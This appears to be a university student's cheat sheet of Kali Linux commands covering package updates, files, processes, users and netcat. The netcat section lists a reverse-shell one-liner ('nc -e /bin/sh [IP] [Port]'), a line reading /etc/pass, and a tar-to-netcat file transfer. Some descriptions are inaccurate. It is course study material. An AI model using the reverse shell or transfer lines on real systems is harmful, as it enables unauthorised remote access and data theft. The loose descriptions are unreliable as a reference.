Kali Commands - kali command descriptions PDF

Title Kali Commands - kali command descriptions
Author Alyazya Mohammed
Course IT Security
Institution Zayed University
Pages 2
File Size 83.6 KB
File Type PDF
Total Downloads 101
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kali command descriptions...


Kali Commands Command sudo apt update sudo apt dist-upgrade sudo apt autoremove apt update && apt upgrade –y Sudo apt-get install ftp

Description Update kali Linux Upgrade Kept Back Packages Uninstall No Longer Required Packages Update kali Linux + Upgrade Kept Back Packages Install package

File and Directory Management man [command] pwd ls –la touch filename chmod 744 filename find / -name “fil*” find / -iname filename locate which

Manual = helping us Print working directory List long format including hidden files. used to create, change and modify timestamps of a file. Change file permissions Find (/directory) name (expression that start with*) Find (/directory) specific_file_name (file name) Search facility faster than find Version + path of the program

Process and Service Management ps ps -ea ps aux ls –la top kill -9 PID (killall) service apache2 [start|stop|restart] /etc/init.d/{servicename} stop ls /etc/init.d/ systemctl list-unit-files systemctl {servicename} [status|start]

List all process + information List all process + information in details List long format including hidden files. Activity monitor + list all programs that are running + uid Kill process. Service (name of service) [start or stop or restart] Service (name of service) stop List what in the following path Control init system Service (name of service)

User Management useradd -d /home/xyz -s /bin/bash -g users -m xyz passwd xyz gedit /etc/group deluser Sudo nano ~/.bashrc

Create a username in system. -d: home_directory -s:shell -g:gid Create password add your user to multiple groups Delete username Nano text editor (~user home directory)

{;, && and |} Multiple Commands Ls; cat /etc/pass && command_1 | command_2 |.... | command_N ls -l | more ls -al > temp more < temp Netcat (nc) nc [IP] [Port]; connect nc –lvp port

nc –v –w 2 z 22; scan

tar -zcf - CD-1.iso | nc -l -p 3000 -q 5

nc -e /bin/sh [IP] [Port];

The first command is executed, and the second one is started as soon as the first one has finished. lets you do something based on whether the previous command completed successfully. Command 1 will process and send it to commands 2 to 3 and then display output. It will display more of the command ls -l Store the output of ls-al to temp file Open temp and use more to read it more than a page. Networking command that support TCP, UDP, and sockets to connect to ports, scan ports, listen on a port, transfer files…etc. Nc = netcat. Ip: IP address port:to connect -l =Used to specify that nc should listen for an incoming connection rather than initiate a connection to a remote host. -v: Have nc give more verbose output. -p: source_port: Specifies the source port nc should use, subject to privilege restrictions and availability -v: verbosity -w: timeout Command that will scan port 22 from the ip specified Command will take iso file and back it with tar and then install it Reverse shell; connection back to my kali, but we should set a listener first.

Shell/Bash scripting echo $SHELL

Echo: display line of text/string that are passed as an argument . in this case it will display the shell....

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